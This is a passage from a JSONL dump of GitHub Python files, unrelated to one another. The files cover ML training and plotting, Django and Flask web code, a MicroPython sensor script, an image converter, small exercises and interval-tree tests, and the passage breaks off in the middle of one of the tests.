Im/Sec: {:.1f}\".format(i * self.trainloader.batch_size / timer.get_stage_elapsed())\n self.logger.info(msg)\n sys.stdout.flush()\n\n # plotting learning rate\n for ii, l in enumerate(self.optim_enc.param_groups):\n self.logger.info(\"Learning rate [{}]: {:4.3e}\".format(ii, l['lr']))\n self.writer.add_scalar('lr/enc_group_%02d' % ii, l['lr'], epoch)\n\n def validation(self, epoch, checkpoint=False):\n self.enc.eval()\n with torch.no_grad():\n IoU = evaluate(self.enc, self.valloader, False)\n mIoU = np.mean(IoU)\n\n self.logger.info(f'IoU: {IoU}')\n self.logger.info(f'mIoU: {mIoU}')\n\n if checkpoint:\n self.checkpoint_best(mIoU, epoch)\n\n self.writer.add_scalar('val_mIoU', mIoU, epoch)\n for idx, class_name in enumerate(self.classNames):\n self.writer.add_scalar(f'val_IoU/{idx:02d}_{class_name}', IoU[idx], epoch)\n\n\nif __name__ == \"__main__\":\n args = get_arguments(sys.argv[1:])\n\n # Reading the config\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n trainer = DecTrainer(args)\n\n trainer.logger.info(\"Config: \\n\")\n trainer.logger.info(cfg)\n\n timer = Timer()\n\n def time_call(func, msg, *args, **kwargs):\n timer.reset_stage()\n func(*args, **kwargs)\n trainer.logger.info(msg + (\" {:3.2}m\".format(timer.get_stage_elapsed() / 60.)))\n\n for epoch in range(trainer.start_epoch, cfg.TRAIN.NUM_EPOCHS + 1):\n trainer.logger.info(\"Epoch >>> {}\".format(epoch))\n\n time_call(trainer.train_epoch, \"Train epoch: \", epoch)\n\n if epoch != 0:\n with torch.no_grad():\n time_call(trainer.validation, \"Validation / Val: \", epoch, checkpoint=True)\n","repo_name":"sennnnn/semseg_benchmark","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19769604932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Dang Kai\n# @Date: 2018-08-06 17:25:43\n# @Last Modified time: 2019-04-30 15:21:11\n# @E-mail: 1370465454@qq.com\n# @Description:定义一些默认参数、路径等\nimport os\nimport time\nnow = time.strftime('%Y-%m-%d_%H_%M_%S')\n# 项目参数设置\nprj_path = os.path.dirname(os.path.dirname(__file__))\n# ��志路径\nlog_path = os.path.join(prj_path, 'report', 'Log')\n\n# 测试报告路径\nreport_path = os.path.join(prj_path, 'report', 'test_report')\n\n# 测试excel结果路径\nresult_path = os.path.join(\n prj_path, 'report', 'test_result\\\\' + now + 'report.xlsx')\n# 默认浏览器\nbrowser = 'Chrome'\n# 浏览器\nurl = 'https://zhytest.999.com.cn/'\n# 测试数据路径\ndata_path = os.path.join(prj_path, 'data', 'test_data')\n# 读取Excel数据\ndata_path_name = os.path.join(prj_path, 'data', \"TestCase.xlsx\")\n# 读取表名\nread_excel_sheetname = \"TestCase\"\n\n# mysql数据库的连接信息\ndb_config = {\n 'host': 'localhost',\n 'port': 3306,\n 'user': 'root',\n 'password': '137046',\n 'database': 'study'\n}\n","repo_name":"DangKaio/python-unittest-requests","sub_path":"config/globalparam.py","file_name":"globalparam.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"34737550416","text":"from django.contrib import admin\nfrom import_export.admin import ImportExportModelAdmin\nfrom .models import Cidade\nfrom .models import Empresa\nfrom .models import Endereco\nfrom .models import Estado\nfrom .models import Pais\n\n\nclass EnderecoInline(admin.StackedInline):\n model = Endereco\n fields = [\n 'cep',\n 'logradouro',\n 'complemento',\n 'numero',\n 'bairro',\n 'pais',\n 'estado',\n 'cidade',\n ]\n exclude = ['data_criacao']\n list_select_related = (\n 'pais',\n 'estado',\n 'cidade',\n )\n\n\n@admin.register(Empresa)\nclass EmpresaAdmin(admin.ModelAdmin):\n list_display = ['id', 'nome', 'cpf_cnpj']\n exclude = ['user', 'data_criacao']\n inlines = (EnderecoInline,)\n\n fieldsets = (\n ('Dados Principais', {'fields': (\n 'foto',\n 'nome',\n 'is_empresa',\n 'cpf_cnpj',\n 'rg'\n )}),\n ('Contato', {'fields': (\n 'telefone',\n 'celular',\n 'email'\n )}),\n ('Detalhes e Configurações', {'fields': (\n 'slogan',\n )}),\n )\n\n\n@admin.register(Cidade)\nclass CidadeAdmin(ImportExportModelAdmin):\n list_display = ['id', 'nome', 'estado', 'pais']\n list_filter = ['estado', 'estado__pais']\n readonly_fields = ['data_criacao']\n\n\n@admin.register(Estado)\nclass EstadoAdmin(ImportExportModelAdmin):\n list_display = ['id', 'nome', 'codigo']\n list_filter = ['pais']\n readonly_fields = ['data_criacao']\n\n\n@admin.register(Pais)\nclass PaisAdmin(admin.ModelAdmin):\n list_display = ['id', 'nome']\n readonly_fields = ['data_criacao']\n","repo_name":"TimeNovaData/infcam","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14683256035","text":"from flask import render_template, request, flash, url_for, redirect\nfrom . import subscription_bp\nfrom ..models import Event, Subscriber\nfrom ..forms import SubscriptionForm\nfrom ..manager import MAX_USER_IN_EVENT\n\n\n@subscription_bp.route('/', methods=['GET', 'POST'])\ndef subscription(event_link):\n # verifica se o id do inscrito atual pertence ao usuario logado\n event = Event.query.filter_by(link=event_link).first()\n data = {'link_full': request.host_url + event_link}\n if event:\n form = SubscriptionForm()\n if request.method == 'GET':\n #verifica se o maximo de usuarios já foi atingido\n if len(event.subscriber) >= MAX_USER_IN_EVENT:\n flash('O evento já está lotado!', 'danger')\n\n elif request.method == 'POST':\n if len(event.subscriber) >= MAX_USER_IN_EVENT:\n flash('O evento já está lotado! Você não pode se inscrever!', 'danger')\n return redirect(url_for('subscription.subscription', event_link=event_link))\n\n elif form.validate_on_submit():\n sub = Subscriber()\n sub.name = form.name.data\n sub.user_id = event.user_id\n\n # verifica se o message já foi cadastrado para o usuario atual!\n if Subscriber.query.filter_by(email=form.email.data, user_id=event.user_id).first():\n flash(f'Falha no cadastro! O email já está em uso!', 'danger')\n return redirect(url_for('subscription.subscription', event_link=event_link))\n\n sub.email = form.email.data\n sub.event.append(event)\n try:\n sub.save()\n except Exception as e:\n print('Erro no bd: ', e)\n flash('Houve uma falha interna, contate o ADM', 'warning')\n else:\n flash('Inscrição realizada com sucesso!', 'success')\n\n\n return render_template('subscription.html', event=event, form=form, data=data)\n\n else:\n return render_template('404.html')\n\n","repo_name":"andersonssh/gerenciador-de-eventos","sub_path":"event_manager/subscription/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22456694244","text":"'''\n11. Using a for loop, create the list below, which consists of ones separated by increasingly many\nzeroes. The last two ones in the list should be separated by ten zeroes.\n[1,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,....]\n'''\n\nlist = [1]\nprint(list)\n\nfor i in range (11):\n if i == 0:\n list.append(1)\n else:\n for j in range (i):\n list.append(0)\n list.append(1)\nprint(list)\n","repo_name":"ralucadragan/A-Practical-Introduction-to-Python-Programming","sub_path":"Jau7_Lists/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26623617338","text":"# AGE CALCULATOR PROJECT\n\n\nimport datetime\nfrom datetime import datetime\nimport sys\nmonthsWithDaysTest = {\n 1: 31,\n 2: 29,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n}\n\nprint('')\nprint('\\n ******** AGE CALCULAOTR ********\\n')\nprint('You are going to enter your date of birth in order....')\nprint('')\n\nwhile True:\n try:\n birthYear = int(input('enter your birth-year(YYYY)?....'))\n birthMonth = int(input('enter your birth-month(MM)?....'))\n birthDay = int(input('enter your birth-day(DD)?....'))\n\n if (birthYear == '' or birthMonth == \"\" or birthDay == ''):\n print('Invalid Input..read instructions and try again....')\n print('')\n continue\n elif birthMonth > 12 or birthDay > 31:\n print('Invalid Input..read instructions and try again....')\n print('')\n continue\n else:\n ageInyears = datetime.now().year - birthYear\n ageInMonth = datetime.now().month - birthMonth\n ageInDays = datetime.now().day - birthDay\n\n\n # cases where teh birthday hanst appeared yet\n if (datetime.now().month < birthMonth or (datetime.now().month == birthMonth and datetime.now().day < birthDay)):\n ageInyears -=1\n ageInMonth += 12\n\n if datetime.now().day < birthDay:\n ageInMonth -= 1\n lastmonth = monthsWithDaysTest[(datetime.now().month + 11) % 12]\n ageInDays += lastmonth\n\n if ageInDays == 1:\n word = 'day'\n else:\n word = 'days'\n\n print(f\"you are {ageInyears} years , {ageInMonth} months and {ageInDays} {word}\")\n\n user_option = input('do you want to try again(Y for YES | N for NO)...').lower()\n if user_option == 'y':\n continue\n elif user_option == 'n':\n print('See ya.....')\n sys.exit(0)\n else:\n print('invalid Option....EXIITNG')\n sys.exit(0)\n except Exception as e:\n print(f'Invalid Input.....Error : {e}')\n\n\n\n\n\n\n","repo_name":"Felix221123/python_projects","sub_path":"age-calculator.py","file_name":"age-calculator.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4617754810","text":"import openmoc\n\n\ndef py_printf(level, my_str, *args):\n \"\"\"Print a log message to the screen and the log file.\n\n This method is a wrapper to the log_printf C++ routine. It allows for\n formatted messages to be printed to the screen in a similar fashion to the\n C/C++ printf method, but with additional formatting provided by the OpenMOC\n logging utilities.\n\n Parameters\n ----------\n level : str\n The logging level for this message (i.e., 'NORMAL')\n my_str : str\n The string to print to the screen\n *args : list\n A variable length list of values for the message string\n\n Examples\n --------\n An example of how this may be used in a OpenMOC Python script is as follows:\n\n >>> value1 = 25\n >>> value2 = 26.0\n >>> log.py_printf('NORMAL', 'My name is Will and I am %d going on ' \\\n '%f years of age', value1, value2)\n\n \"\"\"\n\n if level == 'DEBUG':\n openmoc.log_printf(openmoc.DEBUG, my_str % args)\n elif level == 'INFO':\n openmoc.log_printf(openmoc.INFO, my_str % args)\n elif level == 'NORMAL':\n openmoc.log_printf(openmoc.NORMAL, my_str % args)\n elif level == 'SEPARATOR':\n openmoc.log_printf(openmoc.SEPARATOR, my_str % args)\n elif level == 'HEADER':\n openmoc.log_printf(openmoc.HEADER, my_str % args)\n elif level == 'TITLE':\n openmoc.log_printf(openmoc.TITLE, my_str % args)\n elif level == 'WARNING':\n openmoc.log_printf(openmoc.WARNING, my_str % args)\n elif level == 'CRITICAL':\n openmoc.log_printf(openmoc.CRITICAL, my_str % args)\n elif level == 'RESULT':\n openmoc.log_printf(openmoc.RESULT, my_str % args)\n elif level == 'ERROR':\n openmoc.log_printf(openmoc.ERROR, my_str % args)\n else:\n openmoc.log_printf(openmoc.ERROR, \"Unknown message log level.\")\n\n\ndef set_log_level(level):\n \"\"\"Assign the lowest level logging message to be reported.\n\n Sets the lowest level logging message to print to the screen. This controls\n the lowest level for both logging messages in the C++ source code as well as\n the user's OpenMOC Python input file.\n\n Parameters\n ----------\n level : str\n The minimum logging level (i.e., 'DEBUG', 'INFO')\n\n Examples\n --------\n This routine may be called in an OpenMOC Python script as follows:\n\n >>> log.set_log_level('INFO')\n\n \"\"\"\n\n if level == 'DEBUG':\n openmoc.set_log_level('DEBUG')\n elif level == 'INFO':\n openmoc.set_log_level('INFO')\n elif level == 'NORMAL':\n openmoc.set_log_level('NORMAL')\n elif level == 'SEPARATOR':\n openmoc.set_log_level('SEPARATOR')\n elif level == 'HEADER':\n openmoc.set_log_level('HEADER')\n elif level == 'TITLE':\n openmoc.set_log_level('TITLE')\n elif level == 'WARNING':\n openmoc.set_log_level('WARNING')\n elif level == 'CRITICAL':\n openmoc.set_log_level('CRITICAL')\n elif level == 'RESULT':\n openmoc.set_log_level('RESULT')\n elif level == 'ERROR':\n openmoc.set_log_level('ERROR')\n else:\n py_printf('Cannot set log level to unsupported level %s', str(level))\n","repo_name":"mit-crpg/OpenMOC","sub_path":"openmoc/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"3942021427","text":"class Solution(object):\n def smallerNumbersThanCurrent(self, nums):\n smallers = [0]* len(nums)\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(len(nums)):\n for j in range(len(nums)):\n if( j!= i and nums[j] < nums[i]):\n smallers[i] =j \n return smallers\n \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"smallerThanTheCurrent.py","file_name":"smallerThanTheCurrent.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73043396969","text":"# read analogue temp sensor on Pico\n# conversion for LMT86LPG\n# http://www.ti.com/lit/ds/symlink/lmt86.pdf\n# sensor is +- 0.4 to 0.7C so can round to one decimal place\n# Kirk Martinez and Denise Yap 2018\nimport math\nfrom time import sleep\nfrom pyb import Pin\nfrom pyb import RTC\n\na = pyb.ADC(pyb.Pin.board.A5)\ng = pyb.Pin('A7', pyb.Pin.OUT_PP)\nrtc = RTC()\n\n# set a specific date and time\nrtc.datetime((2019, 7, 27, 5, 15, 42, 0, 0)) \n\n#Tuen on lmt86\nprint('LMT86 turn on.')\ng.high()\n#must wait 2ms before use\nsleep(0.02)\n#Check ADC value \ndef adcValue():\t\n\tadcVal = a.read()\n\treturn adcVal\n\n#Convert ADC value to mV\n#def mV():\n\t# convert adc to mV using 3300mV as Vcc\n\t#tmp = a.read()\n\t#v = tmp * 3300 / 4096.0\t\n\t#tc = ((10.888 - math.sqrt(118.548544 + 0.01388 * (1777.3 -v)))/-0.00694) + 30\t\t\t\n\t#return v\n\t#return(round(tc,1))\n\n#Convert adc to degree celcius\ndef lmt86():\n\tmv = a.read() * 3300.0 / 4096.0\n\ttc2 = ((10.888 - math.sqrt(118.548544 + 0.01388 * (1777.3 - mv)))/-0.00694) + 30\n\tif tc2 > 40:\n\t\ttc2 = 40\n\telif tc2 < -40:\n\t\ttc2 = -40\n\treturn tc2\n\t#return(round(tc2,1))\n\n#Use mean to minimize white noise\t\ndef meantemp():\n\tn = 0.0\n\tfor count in range(1,10):\n\t\tn = n + lmt86()\n\treturn(round(n/10.0,1))\n\ndef rtcc():\n\tr = rtc.datetime() # get date and time\n\treturn r\n\n#while True:\n\t#print(lmt86())\n\t#sleep(1)\t\n\n#Print meantemp for 100 times\t\nfor count in range(1,100):\n\t#print('Date and Time : ')\n\t#print(rtcc())\n\tprint('meantemp : ')\n\tprint(meantemp())\n\tsleep(2)\n\n#Turn off lmt86\nprint('lmt86 turn off.')\ng.low()\t\n","repo_name":"kmartinez/picogps","sub_path":"testfiles/test-temp.py","file_name":"test-temp.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"356926725","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\n\r\n\r\n\r\ndef f1_comparison(f1_scores,method_list):\r\n # Creating a F1 comparison chart\r\n f1_score = pd.Series(f1_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = f1_score, y = f1_score.index)\r\n print('f1_score')\r\n plt.xlabel('F1 Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing F1 Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef recall_comparison(recall_scores,method_list):\r\n # Creating a recall comparison chart\r\n recall_score = pd.Series(recall_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = recall_score, y = recall_score.index)\r\n print('recall_score')\r\n plt.xlabel('Recall Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing Recall Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef accuracy_comparison(accuracy_scores,method_list):\r\n # Creating an accuracy comparison chart\r\n accuracy_score = pd.Series(accuracy_scores, index=method_list).sort_values(ascending=False)\r\n sns.barplot(x = accuracy_score, y = accuracy_score.index)\r\n print('accuracy_score')\r\n plt.xlabel('Accuracy Score')\r\n plt.ylabel('Methods')\r\n plt.title(\"Comparing Accuracy Scores\")\r\n plt.legend()\r\n plt.show()\r\n\r\ndef create_scores():\r\n # getting the scores from the results files\r\n method_list = ['K-means','Spectral Clustering','GMM','Random Forest','MLP','Neural Network',\r\n 'Random Forest with Importance','GMM with PCA','MLP with PCA','NN with PCA']\r\n f1_scores = []\r\n recall_scores = []\r\n accuracy_scores = []\r\n\r\n df1 = pd.read_csv('results_folder/k_means_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/spectral_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/gmm_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/forest_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/mlp_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/nn_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/forest_fi_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0, 0])\r\n recall_scores.append(df1[0, 1])\r\n accuracy_scores.append(df1[0, 2])\r\n\r\n df1 = pd.read_csv('results_folder/cluster_result.csv', names=range(3))\r\n df1 = df1.values\r\n f1_scores.append(df1[0,0])\r\n recall_scores.append(df1[0,1])\r\n accuracy_scores.append(df1[0,2])\r\n\r\n df2 = pd.read_csv('results_folder/mlp_pca_result.csv', names=range(3))\r\n df2 = df2.values\r\n f1_scores.append(df2[0,0])\r\n recall_scores.append(df2[0,1])\r\n accuracy_scores.append(df2[0,2])\r\n\r\n df3 = pd.read_csv('results_folder/nn_pca_result.csv', names=range(3))\r\n df3 = df3.values\r\n f1_scores.append(df3[0,0])\r\n recall_scores.append(df3[0,1])\r\n accuracy_scores.append(df3[0,2])\r\n return method_list, f1_scores, recall_scores, accuracy_scores\r\n\r\n\r\ndef main():\r\n method_list, f1_scores, recall_scores, accuracy_scores = create_scores()\r\n f1_comparison(f1_scores,method_list)\r\n recall_comparison(recall_scores, method_list)\r\n accuracy_comparison(accuracy_scores, method_list)\r\n\r\n\r\n","repo_name":"Meydand2001/Machine-Learning-project","sub_path":"Comparison.py","file_name":"Comparison.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9869503719","text":"#!/usr/bin/env python3\n# pip install pillow to get the PIL module\n\nimport sys\nfrom PIL import Image, ImageChops\nimport numpy as np\nimport os\n\n\nscreen_width = 128\nscreen_height = 64\n\n\ndef main(fn, id, threshold, file=None, ext=\".jpg\"):\n if file:\n f = open(os.path.join('../include/data_img', file + \".h\"), \"w\")\n printto = f\n # and also save thumbnail of jpg\n else:\n printto = sys.stdout\n image = Image.open(os.path.join('img', fn + ext))\n image = rotate_image(image)\n image = resize_image(image, 200, 200)\n image = threshold_image(image, threshold)\n image = trim_image(image)\n image = resize_image(image, screen_width, screen_height)\n print(image.size, end='\\t')\n\n print(\"\\n\"\n \"#define {id}_width {w}\\n\"\n \"#define {id}_height {h}\\n\"\n \"\\n\"\n \"const uint8_t PROGMEM {id}_data[] = {{\\n\"\n .format(id=id, w=image.width, h=image.height), end='', file=printto)\n for y in range(0, image.height):\n for x in range(0, (image.width + 7) // 8 * 8):\n if x == 0:\n print(\" \", end='', file=printto)\n if x % 8 == 0:\n print(\"B\", end='', file=printto)\n\n bit = '1'\n if x < image.width and image.getpixel((x, y)) != 0:\n bit = '0'\n print(bit, end='', file=printto)\n\n if x % 8 == 7:\n print(\",\", end='', file=printto)\n print(file=printto)\n print(\"};\", file=printto)\n if file:\n f.close()\n image.save(os.path.join('img_out', file + \".jpg\"), \"JPEG\")\n\n\ndef resize_image(image, w, h):\n image.thumbnail((w, h), Image.ANTIALIAS)\n # image.thumbnail((screen_height, screen_width), Image.NEAREST)\n return image\n\n\ndef threshold_image(image, threshold):\n image = image.convert('L') # create grayscale\n # image = image.convert('1') # create binary image\n\n def fnth(x):\n return 255 if x > threshold else 0\n image = image.point(fnth, mode='1')\n return image\n\n\ndef rotate_image(image):\n w, h = image.size\n if h > w:\n image = image.rotate(90, expand=True)\n return image\n\n\ndef trim_image(im):\n bg = Image.new(im.mode, im.size, im.getpixel((0, 0)))\n diff = ImageChops.difference(im, bg)\n diff = ImageChops.add(diff, diff, 2.0, -100)\n bbox = diff.getbbox()\n if bbox:\n print('trimming!', end='\\t')\n return im.crop(bbox)\n else:\n return im\n\n\ndef show_image(image):\n image.show()\n\n\nif __name__ == '__main__':\n\n # get all files in dir\n onlyfiles = [f for f in os.listdir('img') if os.path.isfile(os.path.join('img', f))]\n for fn in onlyfiles:\n temp = os.path.splitext(fn)\n fn = temp[0]\n ext = temp[1]\n print(\"Saving {fname}\".format(fname=fn), end='\\t')\n main(fn, fn, 150, file=fn, ext=ext)\n print()\n\n # main(fn, id, 150, file=id)\n","repo_name":"rick3rt/ESP8266exOLED","sub_path":"script/make_splash_folder.py","file_name":"make_splash_folder.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33229902151","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 15 22:11:45 2019\r\n\r\n@author: Nikhil Vishwanath, \r\n M.Sc. Data Science, \r\n Chennai Mathematical Institute\r\n\"\"\"\r\nprint(\"Give input in following format\")\r\nprint(\"k_itemset(k, frequency, vocab file address, docword file address)\")\r\n\r\ndef k_itemset(k, f, vocab, words):\r\n import time\r\n import pandas as pd\r\n \r\n #to start the timer \r\n start = time.time()\r\n \r\n #reading the vocab file \r\n r = pd.read_csv(vocab,sep = \" \",header = None) \r\n r = pd.DataFrame(r)\r\n #increasing the index by one so that index is same as wordID \r\n #which will save storage space \r\n \r\n r.index = range(1,len(r)+1)\r\n \r\n #reading docword file \r\n doc = pd.read_csv(words)\r\n \r\n \r\n df =doc.loc[2:,:] \r\n \r\n #reanming column, because while reading the file it read first entry as column name\r\n df = df.rename(columns = {df.columns[0]:\"A\"})\r\n \r\n #since the file was read as one column dataset, all the lines from 2 onwards have\r\n #three space seperated integers respectively docID, wordID, count \r\n #the line below will make three columns in dataframe \r\n #split each row into three parts and then store values in respective columns\r\n \r\n doc = pd.DataFrame(df.A.str.split(\" \",2).tolist(),columns = [\"docID\",\"wordID\",\"count\"])\r\n doc = pd.DataFrame(doc)\r\n \r\n #then compiling all the words that occur in given document into a single tuple \r\n #and storing the values as list of tuples where each tuple consist of all the words in \r\n #respective document. These tuples are our transactions.\r\n \r\n \r\n \r\n #This for lop was not efficient so I had to drop it\r\n '''\r\n for i in doc[\"docID\"].unique():\r\n d.append(tuple(set( [doc[\"wordID\"][j] for j in doc[doc[\"docID\"]==i].index])))\r\n '''\r\n \r\n #Storing in list of tuples\r\n\r\n d = doc.groupby(\"docID\")[\"wordID\"].apply(tuple)\r\n \r\n \r\n #importing the package efficient_apriory and running apriori algorithm on our transactions\r\n from efficient_apriori import itemsets_from_transactions as item\r\n #item function takes three inputs (list of transactions , min support or frequency, max k frequent itemset)\r\n itemsets = item(d, f, k+1)\r\n \r\n #Earlier I had mapped wordIDs to words while making list of transactions but it was\r\n #very costly in terms of compution and memory, therefore I changed the code such that \r\n #each transaction contains wordIDs and when we get the answer I mapped wordIds to corresponding words\r\n \r\n \r\n \r\n # calculating the end time \r\n end = time.time()\r\n \r\n #if k-itemset is not present for the given freq, it will terminate \r\n \r\n if len(itemsets[0]) offset]\n if after:\n after = after[0]\n else:\n after = None\n offsets[offset] = (before, after)\n return offsets\n\n\ndef make_moment_fixtures(range_=10, intervals=None):\n if not intervals:\n intervals = make_intervals()\n fixtures = {}\n for offset in range(range_):\n overlaps, starts, stops = [], [], []\n for interval in intervals:\n if interval.start_offset == offset:\n starts.append(interval)\n elif interval.stop_offset == offset:\n stops.append(interval)\n elif interval.start_offset < offset < interval.stop_offset:\n overlaps.append(interval)\n overlaps.sort()\n starts.sort()\n stops.sort()\n fixtures[offset] = (overlaps, starts, stops)\n return fixtures\n\n\ndef make_intervals():\n return [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=2, stop_offset=5),\n Interval(start_offset=6, stop_offset=9),\n ]\n\n\ndef make_interval_tree(accelerated, populated=True, intervals=None):\n if populated and not intervals:\n intervals = make_intervals()\n interval_tree = IntervalTree(intervals=intervals, accelerated=accelerated)\n if accelerated:\n assert isinstance(interval_tree._driver, IntervalTreeDriverEx)\n else:\n assert isinstance(interval_tree._driver, IntervalTreeDriver)\n return interval_tree\n\n\ndef make_random_intervals(count=10, range_=10):\n indices = list(range(range_))\n intervals = []\n for _ in range(count):\n random.shuffle(indices)\n start_offset, stop_offset = sorted(indices[:2])\n interval = Interval(start_offset=start_offset, stop_offset=stop_offset)\n intervals.append(interval)\n return intervals\n\n\ndef make_target_intervals(range_=10):\n indices = list(range(range_))\n intervals = []\n for pair in itertools.permutations(indices, 2):\n start_offset, stop_offset = sorted(pair)\n target_interval = Interval(start_offset=start_offset, stop_offset=stop_offset)\n intervals.append(target_interval)\n return intervals\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___contains__(accelerated):\n intervals = make_intervals()\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert intervals[0] in interval_tree\n assert Interval(-1, 100) not in interval_tree\n interval_tree.remove(intervals[-1])\n assert intervals[-1] not in interval_tree\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___getitem__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert interval_tree[-1] == Interval(6, 9)\n assert [interval for interval in interval_tree[:3]] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, stop_offset=3),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___init__(accelerated):\n make_interval_tree(accelerated=accelerated, populated=False)\n make_interval_tree(accelerated=accelerated, populated=True)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___iter__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n Interval(start_offset=6, stop_offset=9),\n ]\n iterator = iter(interval_tree)\n assert next(iterator) == Interval(start_offset=0, stop_offset=3)\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___len__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=False)\n assert len(interval_tree) == 0\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n assert len(interval_tree) == 5\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___setitem__(accelerated):\n interval_tree = make_interval_tree(accelerated=accelerated, populated=True)\n interval_tree[-1] = Interval(-1, 4)\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=-1, stop_offset=4),\n Interval(start_offset=0, stop_offset=3),\n Interval(start_offset=1, stop_offset=2),\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n ]\n interval_tree[:3] = [Interval(100, 200)]\n assert [interval for interval in interval_tree] == [\n Interval(start_offset=1, stop_offset=3),\n Interval(start_offset=2, stop_offset=5),\n Interval(start_offset=100, stop_offset=200),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test___sub__(accelerated):\n interval_tree = make_interval_tree(\n accelerated=accelerated,\n intervals=[Interval(0, 16), Interval(5, 12), Interval(-2, 8)],\n )\n interval = Interval(5, 10)\n result = interval_tree - interval\n assert result[:] == [\n Interval(-2, 5),\n Interval(0, 5),\n Interval(10, 12),\n Interval(10, 16),\n ]\n\n\n@pytest.mark.parametrize(\"accelerated\", [True, False])\ndef test_find_intersection_with_offset(accelerated):\n iterations = 10\n count, range_ = 10, 15\n for i in range(iterations):\n print(\"Iteration:\", i)\n intervals = make_random_intervals(count=count, range_=range_)\n interval_tree = make_interval_tree(accelerated=accelerated, intervals=intervals)\n optimized = 0.0\n brute_force = 0.0\n for offset in range(range_):\n with 